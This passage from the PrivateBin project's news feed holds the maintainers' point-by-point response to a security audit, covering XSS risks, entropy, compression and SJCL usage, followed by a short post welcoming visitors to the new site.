&lt;p&gt;But as long as the encryption logic is delivered by the server, the risk of manipulation is always a possibility. This is not fixable and therefore users have to trust the webserver running PrivateBin. We try to make PrivateBin users aware of this by e.g. stating it &lt;a href="https://github.com/PrivateBin/PrivateBin#what-it-doesnt-provide"&gt;in our Readme&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We consider this issue unsolvable within the scope of the project.&lt;/p&gt;
&lt;h2&gt;4.2. urls2links XSS&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;In zerobin.js, urls2links() converts a URL text into a clickable link. The replacement is done purely by regular expression, and no escaping is done. This may be a source of XSS vulnerabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Only URLs starting with the schemas http, https, ftp and magnet are converted. Also no characters outside A-Z, a-z, 0-9 and the following ones are allowed: ? = &amp;amp; . \ / - ; # @ ~ % + -&lt;/p&gt;
&lt;p&gt;We tried to find better tested implementations, but they ended up being less restrictive on the allowed schemas. So far we could not find a way to inject any executable code, but that is no proof that there isn't.&lt;/p&gt;
&lt;p&gt;We consider this a risky piece of code.&lt;/p&gt;
&lt;h2&gt;4.3. Low Entropy in Browsers Without CSPRNGs&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;If the web browser does not have window.crypto.getRandomValues(), the key is derived from mouse movements and stuff. That may not be good enough. Perhaps in these cases the server could help the client by supplying some of its own entropy from mcrypt_create_iv() or openssl_random_pseudo_bytes().&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We ignored this issue so far, as it affects mostly &lt;a href="http://caniuse.com/#feat=getrandomvalues"&gt;older platforms&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;4.4. Plaintext is Compressed Before Encryption&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Posts are compressed before they are encrypted. This makes the ciphertext length depend on the plaintext content. This may create vulnerabilities in specific use cases where an attacker can choose variations of the same post to be encrypted. This would be similar to the CRIME and BREACH attacks, except happening at the application layer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We don't think this is applicable in our case, as even when generating many pastes with variations of the same content, they would also all get encrypted with different keys. But an &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/38"&gt;issue was created&lt;/a&gt; to implement an option that would allow server admins to disable compression.&lt;/p&gt;
&lt;p&gt;We ignored this issue so far.&lt;/p&gt;
&lt;h2&gt;4.5. Is SJCL used correctly?&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;This audit did not check if zerobin.js uses the SJCL cryptography library correctly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The implementation follows the &lt;a href="http://bitwiseshiftleft.github.io/sjcl/"&gt;examples&lt;/a&gt; of the SJCL librarys homepage and its &lt;a href="http://bitwiseshiftleft.github.io/sjcl/doc/symbols/sjcl.json.html#.encrypt"&gt;API documentation&lt;/a&gt;. We tried to harden its usage further by &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/a28aebae7d1804d324c8073080d7d698875e200f"&gt;explicitly passing&lt;/a&gt; encryption options on mode, key size and authentication tag size instead of using the defaults.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;4.6. Possible XSS in tpl/page.html&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;JSON encoded data is inserted into the HTML page unescaped in tpl/page.html. This is because $STATUS is set to the return value of processPasteFetch(), which returns JSON encoded data based on the user's input.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In the current templates, this and the other variables are encoded/escaped before insertion. As mentioned in point 3.1 this needs to be rechecked for every newly created template.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;We think that what we are left with are two issues that pose larger design challenges or we consider unsolvable in the scope of the project, two issues we ignored as they do not seem to apply to our case or only affect older platforms and for one issue we haven't yet found a better solution short of removing the feature.&lt;/p&gt;
&lt;p&gt;All in all we are confident that most points of this audit could be resolved and are ready for a stable release and future audits.&lt;/p&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/><category term="Audit"/></entry><entry><title>Welcome to our new project page</title><link href="https://privatebin.info/news/welcome.html" rel="alternate"/><published>2016-08-16T20:42:00+02:00</published><updated>2016-08-16T20:42:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2016-08-16:/news/welcome.html</id><summary type="html">&lt;p&gt;An introduction to the new webpage.&lt;/p&gt;</summary><content type="html">&lt;p&gt;In preparation of the upcoming first release of the ZeroBin fork under the new name, we have set up this little project website. Its intended to be updated mostly with release announcements and some intermediate updates such as this one.&lt;/p&gt;
&lt;p&gt;The release has now all the features we thought necessary to include. Currently we are in some final testing rounds and plan to have a the release ready before the end of August.&lt;/p&gt;
&lt;p&gt;Cheers,&lt;br&gt;
El RIDO&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/></entry></feed>